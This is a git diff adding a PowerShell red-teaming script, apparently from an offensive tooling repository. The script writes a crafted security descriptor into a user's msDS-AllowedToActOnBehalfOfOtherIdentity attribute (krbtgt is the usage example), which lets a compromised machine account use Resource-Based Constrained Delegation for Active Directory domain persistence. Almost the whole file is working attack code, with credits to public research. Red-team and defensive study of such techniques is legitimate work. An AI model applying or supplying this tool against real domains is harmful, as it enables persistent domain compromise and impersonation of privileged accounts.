diff --git a/red-teaming/Set-PrincipalAllowedToDelegateToAccount.ps1 b/red-teaming/Set-PrincipalAllowedToDelegateToAccount.ps1
new file mode 100644
index 0000000..a269fcd
--- /dev/null
+++ b/red-teaming/Set-PrincipalAllowedToDelegateToAccount.ps1
@@ -0,0 +1,49 @@
+#
+# Unconstrained Domain Persistence helper
+#
+# Usage:
+#   PS> . .\Set-PrincipalAllowedToDelegateToAccount.ps1
+#   PS> Set-PrincipalAllowedToDelegateToAccount -TargetUser krbtgt -TargetComputer COMPROMISED$
+#
+# Will allow for COMPROMISED$ machine account to perform S4U2 constrained delegation by the use
+# of Resource-Based Constrained Delegation flavour attack.
+#
+# Script for setting "msDS-AllowedToActOnBehalfOfOtherIdentity" property on the user's object, 
+# allowing incoming trust to the previously compromised Machine object, as described 
+# by Elad Shamir in his: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#unconstrained-domain-persistence
+#
+# This script requires PowerView to be loaded first.
+#
+# This is basically rewritten script from Harmj0y's blog post here:
+#   https://www.harmj0y.net/blog/redteaming/another-word-on-delegation/
+# all credits goes to magnificent Harmj0y!
+#
+
+function Set-PrincipalAllowedToDelegateToAccount
+{
+    Param
+    (
+        [Parameter(Position = 0)]
+        [ValidateNotNullOrEmpty()]
+        [String]
+        $TargetUser,
+
+        [Parameter(Position = 1)]
+        [ValidateNotNullOrEmpty()]
+        [String]
+        $TargetComputer
+    )
+    
+    # translate the identity to a security identifier
+    $IdentitySID = ((New-Object -TypeName System.Security.Principal.NTAccount -ArgumentList $TargetComputer).Translate([System.Security.Principal.SecurityIdentifier])).Value
+
+    # Substitute the security identifier into the raw SDDL
+    $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($IdentitySID))"
+
+    # get the binary bytes for the SDDL
+    $SDBytes = New-Object byte[] ($SD.BinaryLength)
+    $SD.GetBinaryForm($SDBytes, 0)
+
+    # set new security descriptor for 'msds-allowedtoactonbehalfofotheridentity'
+    Get-DomainUser $TargetUser | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose
+}
\ No newline at end of file